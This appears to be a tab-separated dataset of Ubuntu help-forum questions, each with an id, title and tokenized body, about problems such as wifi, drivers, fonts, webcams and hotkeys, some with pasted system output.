240902	unable to connect to secured wifi	i have just installed ubuntu 12.10 64bit operating system and i have issue with wifi . i am able to connect to unsecured wifi networks , however , i am not able to connect to secured wifi networks . what should i do ? my wifi adapter is intel wifi link 1000 . please be as specific as possible , since it is really hard for me to use ubuntu now ( i have never used it before ) . thanks .
240903	how can i move steam 's download folder ?	by default , steam downloads games to the home directory . on my laptop , my home partition 's size is only 15gb ; therefore , i 'd like steam to download its games to my data partition instead , which is much larger . how can i achieve this ?
240906	where can i get a free 12.10 ubuntu install disc	my friend has an older 2006 dell laptop media edition with ms win xp and wants to run linux ubuntu 12.10 but , can not download the desktop version offered here ... is there a place to get the install disc for free mailed to him ? on his 2005 hp he successfully downloaded 12.04 but lost his laptops wireless connection in the process and he dont want to be tethered by the ac cord so he went back to windows but really wants what linux is open source . thank you for any info on this .
240913	ubuntu liveusb does n't recognize my windows 8 installation	i have a laptop with uefi ( secure boot disabled ) with windows 8 . i am trying to install ubuntu 12.10 or 12.04 along side windows 8 on my primary hard drive , which uses gpt . i am only presented with the option to erase the disk and install so the install alongside windows option does not appear . how can i install ubuntu without erase my windows system ?
240919	how to install gcc 4.7 on lubuntu 11.10 ?	i installed lubuntu 11.10 and i installed build-essential with this command : sudo apt-get install build-essential now i have gcc 4.6 i read on some forum that adding the next ppa i 'll be able to install gcc 4.7 : sudo add-apt-repository ppa : ubuntu-toolchain-r/test i did that , then ran : sudo apt-get update sudo apt-get install gcc-4.7 but my machine ca n't find the gcc-4.7 package ? any suggestion ?
240922	can i control more exactly the screen brightness / energy saving options in 12.04 lts ?	i have a lenovo x220 with intel hd 3000 on-board chip . when i have in the screen and brightness setting `` save energy '' option activated the screen wil lower the brightness very strongly after just few seconds of non-typing . this is very unhandy . especially if an application is running , like a video is showing in the browser . is there no more detailed way of controlling screen brightness ?
240923	enable sync to vblank on lxde with intel video card	how can i enable sync to vblank in lxde ? my video card is intel , and i 'm having screen tearing .
240928	nitrux icon 's battery indicator symbol is incorrect - how do i fix this ?	i just have installed ubuntu 12.10 ( fresh new installation ) and installed an icon theme pack - nitrux icons - and everything is fine , except the battery icon in the system tray . here 's the icon with the charge adapter unplugged : and it looks fine - that 's the real icon . but when i plug the charger it shows as : thats not the real icon . also , with other themes like faenza - it shows the same icon when the charger is plugged in .
240929	`` wireless disabled by hardware switch '' after suspend and other hardware buttons ineffective - how can i solve this ?	i have recently purchased a novatech nfinity n1410 laptop and am having problems with the wireless , which sudo lshw -c network tells me is centrino wireless-n 2230 and using the iwlwifi driver . the problem is that after the device has been suspended , i am not able to get the wireless working again without a restart . the network indicator states that the wireless disabled by hardware switch . though fn+f2 is meant to be the wireless switch , xev tells me that the system does n't see it as anything at all when i press this hardware combination . also , though the brightness up/down buttons work fine , the volume up/down buttons do not work either . what can i do to fix this ? i am running ubuntu 12.10 with all available updates installed .
240932	help getting wireless working on macbookpro8,1	i have practically no idea of what i 'm doing , but i 've installed ubuntu on my macbookpro8,1 primarily because i needed to use octave and i figured i might as well try out the whole thing here . anyway , i tried to follow the instructions in this answer but i get the following error when i try to enter sudo apt-get install linux-backports-modules-cw-3.2-oneiric-generic-pae i get reading package lists ... done building dependency tree reading state information ... done e : unable to locate package linux-backports-modules-cw-3.2-oneiric-generic-pae e : could n't find any package by regex 'linux-backports-modules-cw-3.2-oneiric-generic-pae' i 'm not sure what this means or what i can do from here . edit as per vivek 's answer , here are the details of /etc/apt/sources.list colin @ biff : ~ $ cat /etc/apt/sources.list # deb cdrom : [ ubuntu 12.10 _quantal quetzal_ - release i386 ( 20121017.2 ) ] / quantal main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //ca.archive.ubuntu.com/ubuntu/ quantal main restricted deb-src http : //ca.archive.ubuntu.com/ubuntu/ quantal main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //ca.archive.ubuntu.com/ubuntu/ quantal-updates main restricted deb-src http : //ca.archive.ubuntu.com/ubuntu/ quantal-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //ca.archive.ubuntu.com/ubuntu/ quantal universe deb-src http : //ca.archive.ubuntu.com/ubuntu/ quantal universe deb http : //ca.archive.ubuntu.com/ubuntu/ quantal-updates universe deb-src http : //ca.archive.ubuntu.com/ubuntu/ quantal-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //ca.archive.ubuntu.com/ubuntu/ quantal multiverse deb-src http : //ca.archive.ubuntu.com/ubuntu/ quantal multiverse deb http : //ca.archive.ubuntu.com/ubuntu/ quantal-updates multiverse deb-src http : //ca.archive.ubuntu.com/ubuntu/ quantal-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //ca.archive.ubuntu.com/ubuntu/ quantal-backports main restricted universe multiverse deb-src http : //ca.archive.ubuntu.com/ubuntu/ quantal-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu quantal-security main restricted deb-src http : //security.ubuntu.com/ubuntu quantal-security main restricted deb http : //security.ubuntu.com/ubuntu quantal-security universe deb-src http : //security.ubuntu.com/ubuntu quantal-security universe deb http : //security.ubuntu.com/ubuntu quantal-security multiverse deb-src http : //security.ubuntu.com/ubuntu quantal-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu quantal partner # deb-src http : //archive.canonical.com/ubuntu quantal partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu quantal main deb-src http : //extras.ubuntu.com/ubuntu quantal main
240933	geany - what 's the shortcut for inserting curly brackets ?	as it is written above . i came across that shortcut a few times but unfortunately i ca n't recall it because i found it not very useful . now i 've changed my mind and i was searching through web but without any success . could somebody help me , please ?
240935	can not get 3d opengl support in vmware guests , how can i fix this ?	i have been working at this problem for 2 days now . i can not for the life of me enable 3d support in vmware 9 guests . my specifications are : hardware : dell latitude e5520 laptop . processor : intel i7-2620m cpu @ 2.70ghz × 4 . memory : 8gb . video : intel sandybridge mobile x86/mmx/sse2 os : ubuntu 12.04.1 lts , 32 bit . vmware workstation : 9.0.1 build-894247 glxgears functions fine . frame rate is ~60fps . vmware guest : windows 7 starting the windows 7 guest in vmware throws the following errors : no 3d support is available from the host . and hardware graphics acceleration is not available . i 've read through this vmware forum thread , but again the hardware in the post is different ( nvidia ) . i 've followed the instructions at this ask ubuntu post as closely as possible as the question is nearly the same as mine although my hardware is different . answer 1 regarding setting mks.gl.allowblacklisteddrivers = true ; in my vmx configuration file causes the vm to crash when it starts . the second answer i followed as closely as possible . i uninstalled vmware , did sudo apt-get install build-essential linux-headers- $ ( uname -r ) at a terminal , added the ppa https : //launchpad.net/~glasen/+archive/intel-driver , then at a terminal did sudo apt-get update & & sudo apt-get upgrade -y i reinstalled vmware and have the same results : no 3d in guests . i 'm getting the feeling that something is awry with the sandy bridge driver , but i ca n't seem to come up with any solutions . has anyone out there run across this problem also ? by the way , the operation of the likes of solidworks and autocad within a windpws 7 guest does appear to be improved in vmware 9 vs vmware 8 in spite of the fact that 3d support is lacking in the windows 7 guest . i 'd also add that my glxinfo file was nearly identical to the glxinfo file posted at askubuntu.com/questions/181829/… . i had a total of seven minor differences per a comparison using meld . –
240940	ubuntu only recognizes 1 audio jack out of two	i have an alienware m14x , as the title sais i have two audio jack but only one works when i plug the earphones . also mi mic jack doesnât work either . what can i do to activate them or make ubuntu aware that they exist
240942	version ubuntu 12.10 for intel	when i want to start the download of ubuntu 12.10 desktop 64 bit , it directly want to download the amd64 iso . does this mean there is also a intel version ? if so , where can it be found ? i have an intel core2duo t9300 2.50ghz processor so it can run the 64 bit version . specs : http : //ark.intel.com/products/33917/intel-core2-duo-processor-t9300-6m-cache-2_50-ghz-800-mhz-fsb thanks in advanced
241943	how do i make it so that the spread comes up on one click ?	in ubuntu 12.10 , if i have multiple windows of an app , the first click on an icon brings the app window that is focused into view , and only the second click brings up what ubuntu calls the spread here : http : //design.canonical.com/2012/03/task-switching-in-ubuntu-and-a-introduction-to-the-spread/ as someone who just switched to ubuntu from windows xp , which effectively gives me the spread in one click , i find this slightly annoying . is there a way to change the preferences so that the spread comes up on the first click , not the second ?
241944	how to fix the hard-drive bad sector	i tried to fix my hard drive using ubuntu but i found that message and did n't know what to do with ... . i need to fix my bad sectors fsck /dev/sdb fsck from util-linux 2.20.1 e2fsck 1.42.5 ( 29-jul-2012 ) fsck.ext2 : permission denied while trying to open /dev/sdb you must have r/w access to the filesystem or be root
241950	xubuntu 12.10 can not archive folder on desktop	when i right click a folder on the desktop , there 's no option to archive it . i actually have to open up the thunar file manager , navigate to the desktop folder , and right click on the folder in order to archive it . why ca n't i archive directly from the desktop ?
241955	monitor flickers in a msi u120/wind u100	i have just installed ubuntu 12.04 on my computer . it came with windows xp . my computer is an msi u120 . now when i turn on my computer and go into ubuntu my screen brightness is on low . when i then turn up the brightness the screen starts to flicker . it also shows the indicator of how much brightness my screen has . my friend talked me through `` backlight '' but it did n't help . any other ideas ?
241956	what are some good alternatives to ps3 media server ?	i 've typically ran ps3 media server for a few years now to serve and transcode video to multiple devices . it 's great at transcoding videos for each device specifically . in my experience , ps3 media server is n't a great daemon . i 've seen web pages that show how to configure it as a daemon but i 've ran into nothing but problems while trying to run it headless . it 's also very inefficient in some circumstances . for example , there are times where only the audio within a video needs converted and can be done within several seconds on the same computer from the command line for the entire video . ( possibly irrelevant depending on how transcoding is implemented ) some devices that i serve video to include the xbox 360 , playstation 3 , and a tv . my videos are stored in many different formats and use various encodings . what are some good alternatives to the ps3 media server that can be ran as a daemon ?
241961	can i upgrade my 32-bit version of ubuntu to 64-bit ubuntu ?	for a while , i have been using a 32-bit version of ubuntu , and i have been considering switching to the 64-bit version . because i am not too familiar with the ins and outs of ubuntu yet , i was wondering if it 's possible to directly upgrade to the 64-bit version , or will i have to uninstall ubuntu , and then re-install it ?
241965	ubuntu does not detect my vaio webcam	i 've installed ubuntu 12.10 . i 'm using a sony vaio vgn-fe52b laptop which i bought in japan . since i installed ubuntu ( and accidentally overwrote the vista recovery partition ) i have not been able to get my webcam working . i 've tried both lsusb and lspci which gives me the following : lsusb bus 004 device 002 : id 0451:2036 texas instruments , inc. tusb2036 hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 003 : id 054c:01bb sony corp. felica s320 [ pasori ] lspci 00:00.0 host bridge : intel corporation mobile 945gm/pm/gms , 943/940gml and 945gt express memory controller hub ( rev 03 ) 00:01.0 pci bridge : intel corporation mobile 945gm/pm/gms , 943/940gml and 945gt express pci express root port ( rev 03 ) 00:1b.0 audio device : intel corporation nm10/ich7 family high definition audio controller ( rev 02 ) 00:1c.0 pci bridge : intel corporation nm10/ich7 family pci express port 1 ( rev 02 ) 00:1c.1 pci bridge : intel corporation nm10/ich7 family pci express port 2 ( rev 02 ) 00:1c.2 pci bridge : intel corporation nm10/ich7 family pci express port 3 ( rev 02 ) 00:1c.3 pci bridge : intel corporation nm10/ich7 family pci express port 4 ( rev 02 ) 00:1d.0 usb controller : intel corporation nm10/ich7 family usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation nm10/ich7 family usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation nm10/ich7 family usb uhci controller # 3 ( rev 02 ) 00:1d.3 usb controller : intel corporation nm10/ich7 family usb uhci controller # 4 ( rev 02 ) 00:1d.7 usb controller : intel corporation nm10/ich7 family usb2 ehci controller ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev e2 ) 00:1f.0 isa bridge : intel corporation 82801gbm ( ich7-m ) lpc interface bridge ( rev 02 ) 00:1f.1 ide interface : intel corporation 82801g ( ich7 family ) ide controller ( rev 02 ) 00:1f.2 ide interface : intel corporation 82801gbm/ghm ( ich7-m family ) sata controller [ ide mode ] ( rev 02 ) 00:1f.3 smbus : intel corporation nm10/ich7 family smbus controller ( rev 02 ) 01:00.0 vga compatible controller : nvidia corporation g73 [ geforce go 7600 ] ( rev a1 ) 06:00.0 network controller : intel corporation pro/wireless 3945abg [ golan ] network connection ( rev 02 ) 0a:03.0 cardbus bridge : texas instruments pcixx12 cardbus controller 0a:03.1 firewire ( ieee 1394 ) : texas instruments pcixx12 ohci compliant ieee 1394 host controller 0a:03.2 mass storage controller : texas instruments 5-in-1 multimedia card reader ( sd/mmc/ms/ms pro/xd ) 0a:08.0 ethernet controller : intel corporation pro/100 ve network connection ( rev 02 ) i do n't see my webcam . i tried the sony website but because it 's all in japanese it 's a little tricky but they do n't seem to provide a single driver , and i 'm sure they wo n't provide anything support for ubuntu . so i wanted to find the webcam model and search elsewhere for the driver . is there any other way that i can detect the webcam ? maybe if i can figure out which webcam it is but if ubuntu is not even detecting the device i do n't know how i 'd update the driver anyway . i do n't want to buy a separate webcam but thinking i may have to . any help would be much appreciated . thanks
241970	installing jdevstudio in ubuntu	i 'm trying to install jdevstudio from oracle on ubuntu 12.10 . i have downloaded a file with .bin extension . unfortunately neither of the two provided methods ( using terminal or setting the permission ) works for me . i have placed the file in home folder but again nothing happens . what should i do ? p.s . when using ./jdevstudio11123isntall.bin command , terminal responds with unable to execute [ filename ] no such file or directory .
241975	why ca n't i install fonts system-wide ?	i am having trouble installing some .ttfs that i earlier added to a win7 system and now am trying to add to a 64-bit 12.04 lts system . i initially installed the fonts to my /home/.fonts folder and all worked well ( after sudo fc-cache -f -v the fonts were available in libreoffice ) . later decided to remove them from /home/.fonts and install in /usr/share/fonts/truetype so the fonts can be used globally . first deleted from /home/.fonts folder and rebuilt cache . check libreoffice and they were removed successfully . then copied in pasted into new folder /usr/share/fonts/truetype/myfonts and rebuilt cache . there was an `` invalid cache '' warning , so rebuilt cache again . no error this time . rebooted , but fonts not available in libreoffice . went to tweaks/fonts section of ubuntu tweak , and the names of the installed fonts appear but the example characters below the names are black-bordered white rectangles ( not `` the quick brown ... '' in the selected font ) . uninstalled from /usr/share/fonts , reinstalled in /home/.fonts , and the fonts worked again in libreoffice . uninstalled from /home/.fonts , installed in /usr/share/fonts , not working again ( this time used sudo fc-cache -rv ) . additionally , i downloaded a new font from the web and placed file in /usr/share/fonts . after sudo fc-cache -f -v this new font shows up working normally in libreoffice . none of the others work , however , unless in /home/.fonts . last try ( as per webbyit ) - tried sudo mv ~/.fonts/name.font /usr/share/fonts/ for all of the fonts . they are now located in /usr/share/fonts and working on my administrator account . however , they still do n't work for any other accounts ( standard or guest ) . any ideas what the heck is going on ? ? ? i would still like to use these fonts globally .
241976	ubuntu virtual terminals hotkey problem	this problem appears from at least 11.04 till at least 12.04 . usually if you want to open one of six virtual terminals , you press hotkeys ctrl+alt+f [ 1-6 ] ( or ctrl+alt+f7 to go back to x ) . but i have a problem on every build i 've tested that virtual terminals which are opened with alt+f [ 1-6 ] ( ctrl is not used ) . so if you want just to close an application ( alt+f4 ) or to open an `` execute '' dialog ( alt+f2 ) , you firstly get # 4 or # 2 virtual terminal and after that when you come back to # 7 ( x ) , the requested action is executed . the only solution for now i 've found by experiment is restarting the x user session . so every time i boot in ubuntu , i have to re-login to cure this bug till my next boot . i 've looked for solutions in the internet , but my question formulations have been luring me to other problems , very far from mine . hardware info : dmidecode 2.11 smbios 2.6 present . 63 structures occupying 2519 bytes . table at 0x000e0850 . handle 0x0000 , dmi type 0 , 24 bytes bios information vendor : phoenix technologies ltd . version : 05fi release date : 10/12/2011 address : 0xe0000 runtime size : 128 kb rom size : 2560 kb characteristics : pci is supported bios is upgradeable bios shadowing is allowed boot from cd is supported selectable boot is supported edd is supported print screen service is supported ( int 5h ) 8042 keyboard services are supported ( int 9h ) serial services are supported ( int 14h ) printer services are supported ( int 17h ) cga/mono video services are supported ( int 10h ) nec pc-98 acpi is supported usb legacy is supported bios boot specification is supported function key-initiated network boot is supported targeted content distribution is supported bios revision : 0.1 handle 0x0001 , dmi type 1 , 27 bytes system information manufacturer : samsung electronics co. , ltd . product name : 300v3a/300v4a/300v5a/200a4b/200a5b version : 0.1 serial number : hn6b93qbc00323 uuid : 1fa57720-1dd2-11b2-8000-b933ab406d0d wake-up type : other sku number : system skunumber family : huronriver system handle 0x0002 , dmi type 2 , 15 bytes base board information manufacturer : samsung electronics co. , ltd . product name : 300v3a/300v4a/300v5a/200a4b/200a5b version : fab1 serial number : 123490en400015 asset tag : base board asset tag features : board is a hosting board board is replaceable location in chassis : part component chassis handle : 0x0000 type : motherboard contained object handles : 0 handle 0x0003 , dmi type 3 , 21 bytes chassis information manufacturer : samsung electronics co. , ltd . type : laptop lock : not present version : 0.1 serial number : 123490en400015 asset tag : asset tag boot-up state : safe power supply state : safe thermal state : other security status : other oem information : 0x00000000 height : unspecified number of power cords : 1 contained elements : 0 handle 0x0004 , dmi type 8 , 9 bytes port connector information internal reference designator : none internal connector type : none external reference designator : keyboard external connector type : ps/2 port type : keyboard port handle 0x0005 , dmi type 8 , 9 bytes port connector information internal reference designator : none internal connector type : none external reference designator : mouse external connector type : ps/2 port type : mouse port handle 0x0006 , dmi type 8 , 9 bytes port connector information internal reference designator : none internal connector type : other external reference designator : com 1 external connector type : none port type : serial port 16550a compatible handle 0x0007 , dmi type 8 , 9 bytes port connector information internal reference designator : none internal connector type : none external reference designator : usb2.0 - 1 # external connector type : access bus ( usb ) port type : usb handle 0x0008 , dmi type 8 , 9 bytes port connector information internal reference designator : none internal connector type : none external reference designator : usb2.0 - 2 # external connector type : access bus ( usb ) port type : usb handle 0x0009 , dmi type 8 , 9 bytes port connector information internal reference designator : none internal connector type : none external reference designator : usb2.0 - 3 # external connector type : access bus ( usb ) port type : usb handle 0x000a , dmi type 8 , 9 bytes port connector information internal reference designator : none internal connector type : none external reference designator : usb2.0 - 4 # external connector type : access bus ( usb ) port type : usb handle 0x000b , dmi type 8 , 9 bytes port connector information internal reference designator : none internal connector type : none external reference designator : usb2.0 - 5 # external connector type : access bus ( usb ) port type : usb handle 0x000c , dmi type 8 , 9 bytes port connector information internal reference designator : none internal connector type : none external reference designator : usb2.0 - 6 # external connector type : access bus ( usb ) port type : usb handle 0x000d , dmi type 8 , 9 bytes port connector information internal reference designator : none internal connector type : none external reference designator : usb2.0 - 7 # external connector type : access bus ( usb ) port type : usb handle 0x000e , dmi type 8 , 9 bytes port connector information internal reference designator : none internal connector type : none external reference designator : usb2.0 - 8 # external connector type : access bus ( usb ) port type : usb handle 0x000f , dmi type 8 , 9 bytes port connector information internal reference designator : none internal connector type : none external reference designator : usb2.0 - 9 # external connector type : access bus ( usb ) port type : usb handle 0x0010 , dmi type 8 , 9 bytes port connector information internal reference designator : none internal connector type : none external reference designator : usb2.0 - 10 # external connector type : access bus ( usb ) port type : usb handle 0x0011 , dmi type 8 , 9 bytes port connector information internal reference designator : none internal connector type : none external reference designator : usb2.0 - 11 # external connector type : access bus ( usb ) port type : usb handle 0x0012 , dmi type 8 , 9 bytes port connector information internal reference designator : none internal connector type : none external reference designator : usb2.0 - 12 # external connector type : access bus ( usb ) port type : usb handle 0x0013 , dmi type 8 , 9 bytes port connector information internal reference designator : none internal connector type : none external reference designator : usb2.0 - 13 # external connector type : access bus ( usb ) port type : usb handle 0x0014 , dmi type 8 , 9 bytes port connector information internal reference designator : none internal connector type : none external reference designator : usb2.0 - 14 # external connector type : access bus ( usb ) port type : usb handle 0x0015 , dmi type 8 , 9 bytes port connector information internal reference designator : none internal connector type : none external reference designator : ethernet external connector type : rj-45 port type : network port handle 0x0016 , dmi type 8 , 9 bytes port connector information internal reference designator : sata port 1 j8j1 internal connector type : sas/sata plug receptacle external reference designator : none external connector type : none port type : sata handle 0x0017 , dmi type 8 , 9 bytes port connector information internal reference designator : sata port 2 j7g1 internal connector type : sas/sata plug receptacle external reference designator : none external connector type : none port type : sata handle 0x0018 , dmi type 8 , 9 bytes port connector information internal reference designator : sata port 3 ( odd ) j9e7 internal connector type : sas/sata plug receptacle external reference designator : none external connector type : none port type : sata handle 0x0019 , dmi type 8 , 9 bytes port connector information internal reference designator : none internal connector type : none external reference designator : esata port 1 j6j1 external connector type : sas/sata plug receptacle port type : sata handle 0x001a , dmi type 8 , 9 bytes port connector information internal reference designator : none internal connector type : none external reference designator : esata port 2 j7j1 external connector type : sas/sata plug receptacle port type : sata handle 0x001b , dmi type 8 , 9 bytes port connector information internal reference designator : none internal connector type : none external reference designator : sata port 6 ( docking ) external connector type : sas/sata plug receptacle port type : sata handle 0x001c , dmi type 9 , 17 bytes system slot information designation : peg gen1/gen2 x16 type : x16 pci express x16 current usage : in use length : long id : 0 characteristics : 3.3 v is provided opening is shared pme signal is supported bus address : 0000:00:00.0 handle 0x001d , dmi type 9 , 17 bytes system slot information designation : pci-express 1 x1 type : x1 pci express current usage : in use length : short id : 1 characteristics : 3.3 v is provided opening is shared pme signal is supported bus address : 0000:00:00.0 handle 0x001e , dmi type 9 , 17 bytes system slot information designation : pci-express 2 x1 type : x1 pci express current usage : available length : short id : 2 characteristics : 3.3 v is provided opening is shared pme signal is supported bus address : 0000:00:00.0 handle 0x001f , dmi type 9 , 17 bytes system slot information designation : pci-express 3 x1 type : x1 pci express current usage : available length : short id : 3 characteristics : 3.3 v is provided opening is shared pme signal is supported bus address : 0000:00:00.0 handle 0x0020 , dmi type 9 , 17 bytes system slot information designation : pci-express 4 x1 type : x1 pci express current usage : in use length : short id : 4 characteristics : 3.3 v is provided opening is shared pme signal is supported bus address : 0000:00:00.0 handle 0x0021 , dmi type 9 , 17 bytes system slot information designation : pci-express 5 x1 type : x1 pci express current usage : available length : short id : 5 characteristics : 3.3 v is provided opening is shared pme signal is supported bus address : 0000:00:00.0 handle 0x0022 , dmi type 10 , 6 bytes on board device information type : video status : enabled description : intel ( r ) extreme graphics 3 controller handle 0x0023 , dmi type 10 , 6 bytes on board device information type : sound status : enabled description : intel ( r ) azalia audio device handle 0x0024 , dmi type 11 , 5 bytes oem strings string 1 : aaabaaaaaaaa string 2 : 2012/02/22 handle 0x0025 , dmi type 12 , 5 bytes system configuration options handle 0x0026 , dmi type 13 , 22 bytes bios language information language description format : abbreviated installable languages : 4 en-us fr-fr ja-jp ko-kr currently installed language : en-us handle 0x0027 , dmi type 22 , 26 bytes portable battery location : rear manufacturer : intel corp . manufacture date : 2008 serial number : 1.0 name : smart battery design capacity : unknown design voltage : unknown sbds version : v1.0 maximum error : unknown sbds chemistry : lithium-ion oem-specific information : 0x00000000 handle 0x0028 , dmi type 32 , 11 bytes system boot information status : no errors detected handle 0x0029 , dmi type 18 , 23 bytes 32-bit memory error information type : ok granularity : unknown operation : unknown vendor syndrome : unknown memory array address : unknown device address : unknown resolution : unknown handle 0x002a , dmi type 21 , 7 bytes built-in pointing device type : mouse interface : ps/2 buttons : 2 handle 0x002b , dmi type 23 , 13 bytes system reset status : disabled watchdog timer : present boot option : do not reboot boot option on limit : do not reboot reset count : unknown reset limit : unknown timer interval : unknown timeout : unknown handle 0x002c , dmi type 24 , 5 bytes hardware security power-on password status : unknown keyboard password status : unknown administrator password status : unknown front panel reset status : unknown handle 0x002d , dmi type 27 , 14 bytes cooling device type : unknown status : unknown oem-specific information : 0x00000090 nominal speed : unknown or non-rotating handle 0x002e , dmi type 39 , 22 bytes system power supply location : tbd by odm name : tbd by odm manufacturer : tbd by odm serial number : tbd by odm asset tag : tbd by odm model part number : tbd by odm revision : 1.0 max power capacity : unknown status : present , ok type : battery input voltage range switching : other plugged : yes hot replaceable : yes handle 0x002f , dmi type 4 , 42 bytes processor information socket designation : cpu type : central processor family : core i7 manufacturer : intel ( r ) corporation id : a7 06 02 00 ff fb eb bf signature : type 0 , family 6 , model 42 , stepping 7 flags : fpu ( floating-point unit on-chip ) vme ( virtual mode extension ) de ( debugging extension ) pse ( page size extension ) tsc ( time stamp counter ) msr ( model specific registers ) pae ( physical address extension ) mce ( machine check exception ) cx8 ( cmpxchg8 instruction supported ) apic ( on-chip apic hardware supported ) sep ( fast system call ) mtrr ( memory type range registers ) pge ( page global enable ) mca ( machine check architecture ) cmov ( conditional move instruction supported ) pat ( page attribute table ) pse-36 ( 36-bit page size extension ) clfsh ( clflush instruction supported ) ds ( debug store ) acpi ( acpi supported ) mmx ( mmx technology supported ) fxsr ( fxsave and fxstor instructions supported ) sse ( streaming simd extensions ) sse2 ( streaming simd extensions 2 ) ss ( self-snoop ) htt ( multi-threading ) tm ( thermal monitor supported ) pbe ( pending break enabled ) version : intel ( r ) core ( tm ) i5-2450m cpu @ 2.50ghz voltage : 1.2 v external clock : 100 mhz max speed : 2500 mhz current speed : 2500 mhz status : populated , enabled upgrade : zif socket l1 cache handle : 0x0030 l2 cache handle : 0x0031 l3 cache handle : 0x0032 serial number : not supported by cpu asset tag : tbd by oem part number : tbd by oem core count : 2 core enabled : 2 thread count : 4 characteristics : 64-bit capable handle 0x0030 , dmi type 7 , 19 bytes cache information socket designation : l1-cache configuration : enabled , not socketed , level 1 operational mode : write through location : internal installed size : 64 kb maximum size : 64 kb supported sram types : synchronous installed sram type : synchronous speed : unknown error correction type : single-bit ecc system type : data associativity : 8-way set-associative handle 0x0031 , dmi type 7 , 19 bytes cache information socket designation : l2-cache configuration : enabled , not socketed , level 2 operational mode : write through location : internal installed size : 256 kb maximum size : 256 kb supported sram types : synchronous installed sram type : synchronous speed : unknown error correction type : single-bit ecc system type : data associativity : 8-way set-associative handle 0x0032 , dmi type 7 , 19 bytes cache information socket designation : l3-cache configuration : enabled , not socketed , level 3 operational mode : write back location : internal installed size : 3072 kb maximum size : 3072 kb supported sram types : synchronous installed sram type : synchronous speed : unknown error correction type : single-bit ecc system type : unified associativity : 12-way set-associative handle 0x0033 , dmi type 16 , 15 bytes physical memory array location : system board or motherboard use : system memory error correction type : none maximum capacity : 16 gb error information handle : not provided number of devices : 4 handle 0x0034 , dmi type 17 , 28 bytes memory device array handle : 0x0033 error information handle : not provided total width : 64 bits data width : 64 bits size : 2048 mb form factor : sodimm set : none locator : channela-dimm0 bank locator : bank 0 type : ddr3 type detail : synchronous speed : 1333 mhz manufacturer : samsung serial number : b41cc40d asset tag : 9876543210 part number : m471b5773chs-ch9 rank : unknown handle 0x0035 , dmi type 20 , 19 bytes memory device mapped address starting address : 0x00000000000 ending address : 0x0007fffffff range size : 2 gb physical device handle : 0x0034 memory array mapped address handle : 0x003a partition row position : unknown interleave position : 1 interleaved data depth : 2 handle 0x0036 , dmi type 17 , 28 bytes memory device array handle : 0x0033 error information handle : not provided total width : unknown data width : unknown size : no module installed form factor : dimm set : none locator : channela-dimm1 bank locator : bank 1 type : unknown type detail : none speed : unknown manufacturer : not specified serial number : not specified asset tag : 9876543210 part number : not specified rank : unknown handle 0x0037 , dmi type 17 , 28 bytes memory device array handle : 0x0033 error information handle : not provided total width : 64 bits data width : 64 bits size : 4096 mb form factor : sodimm set : none locator : channelb-dimm0 bank locator : bank 2 type : ddr3 type detail : synchronous speed : 1333 mhz manufacturer : samsung serial number : 01190cd6 asset tag : 9876543210 part number : m471b5273cm0-ch9 rank : unknown handle 0x0038 , dmi type 20 , 19 bytes memory device mapped address starting address : 0x00080000000 ending address : 0x0017fffffff range size : 4 gb physical device handle : 0x0037 memory array mapped address handle : 0x003a partition row position : unknown interleave position : 2 interleaved data depth : 2 handle 0x0039 , dmi type 17 , 28 bytes memory device array handle : 0x0033 error information handle : not provided total width : unknown data width : unknown size : no module installed form factor : dimm set : none locator : channelb-dimm1 bank locator : bank 3 type : unknown type detail : none speed : unknown manufacturer : not specified serial number : not specified asset tag : 9876543210 part number : not specified rank : unknown handle 0x003a , dmi type 19 , 15 bytes memory array mapped address starting address : 0x00000000000 ending address : 0x0017fffffff range size : 6 gb physical array handle : 0x0033 partition width : 4 handle 0x003b , dmi type 129 , 8 bytes oem-specific type header and data : 81 08 3b 00 01 01 02 01 strings : intel_asf intel_asf_001 handle 0x003c , dmi type 131 , 64 bytes oem-specific type header and data : 83 40 3c 00 31 00 00 00 00 00 00 00 00 00 00 00 f8 00 49 1c ff ff ff ff 09 c0 00 00 01 00 07 00 40 04 0d 00 00 00 00 00 c8 00 ff ff 00 00 00 00 00 00 00 00 36 00 00 00 76 50 72 6f 00 00 00 00 handle 0x003d , dmi type 15 , 29 bytes system event log area length : 18 bytes header start offset : 0x0000 header length : 16 bytes data start offset : 0x0010 access method : general-purpose non-volatile data functions access address : 0x00f0 status : valid , not full change token : 0x00000000 header format : type 1 supported log type descriptors : 3 descriptor 1 : post error data format 1 : post results bitmap descriptor 2 : single-bit ecc memory error data format 2 : multiple-event descriptor 3 : multi-bit ecc memory error data format 3 : multiple-event handle 0x003e , dmi type 127 , 4 bytes end of table
